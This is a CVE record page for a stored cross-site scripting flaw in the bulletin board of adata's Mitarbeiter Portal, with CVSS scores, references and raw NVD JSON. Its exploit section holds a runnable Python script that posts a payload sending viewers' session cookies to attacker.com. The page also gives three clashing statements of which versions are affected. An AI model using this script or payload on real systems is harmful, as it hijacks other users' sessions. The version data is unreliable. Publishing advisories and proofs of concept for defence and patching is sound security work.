CVE-2025-61074

Description

A stored Cross Site Scripting (XSS) vulnerability in the bulletin board (SchwarzeBrett) in adata Software GmbH Mitarbeiter Portal 2.15.2.0 allows remote authenticated users to execute arbitrary JavaScript code in the web browser of other users via manipulation of the 'Inhalt' parameter of the '/SchwarzeBrett/Nachrichten/CreateNachricht' or '/SchwarzeBrett/Nachrichten/EditNachricht/' requests.

CVSS Details

CVSS Score

4.6

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:adata:mitarbeiter_portal:*:*:*:*:*:*:*:* - VULNERABLE

adata Software GmbH Mitarbeiter Portal < 2.15.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-61074 PoC - Stored XSS in adata Mitarbeiter Portal
# Target: /SchwarzeBrett/Nachrichten/CreateNachricht

TARGET_URL = "http://target-server/SchwarzeBrett/Nachrichten/CreateNachricht"
LOGIN_URL = "http://target-server/api/auth/login"

# Malicious XSS payload
XSS_PAYLOAD = "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>"

def exploit():
    # Step 1: Authenticate with low-privilege account
    session = requests.Session()
    login_data = {
        "username": "attacker_user",
        "password": "password123"
    }
    session.post(LOGIN_URL, json=login_data)
    
    # Step 2: Create message with XSS payload in 'Inhalt' parameter
    message_data = {
        "Inhalt": XSS_PAYLOAD,
        "Titel": "Test Message"
    }
    response = session.post(TARGET_URL, json=message_data)
    
    # Step 3: When other users view the bulletin board,
    # the stored script will execute in their browsers
    print(f"Exploit sent. Status: {response.status_code}")
    print(f"Payload stored: {XSS_PAYLOAD}")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61074
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61074
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61074/
[4] VulDB https://vuldb.com/cve/CVE-2025-61074
[5] https://no-sec.net/posts/cve-2025-61074/
[6] https://www.adata.de/mitarbeiter-portal/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61074", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:59.957", "lastModified": "2026-01-14T15:15:57.587", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored Cross Site Scripting (XSS) vulnerability in the bulletin board (SchwarzeBrett) in adata Software GmbH Mitarbeiter Portal 2.15.2.0 allows remote authenticated users to execute arbitrary JavaScript code in the web browser of other users via manipulation of the 'Inhalt' parameter of the '/SchwarzeBrett/Nachrichten/CreateNachricht' or '/SchwarzeBrett/Nachrichten/EditNachricht/' requests."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adata:mitarbeiter_portal:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.16.1", "matchCriteriaId": "4F088A9A-0FDB-4E69-AB75-5CE0609F65FA"}]}]}], "references": [{"url": "https://no-sec.net/posts/cve-2025-61074/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.adata.de/mitarbeiter-portal/", "source": "[email protected]", "tags": ["Product"]}]}}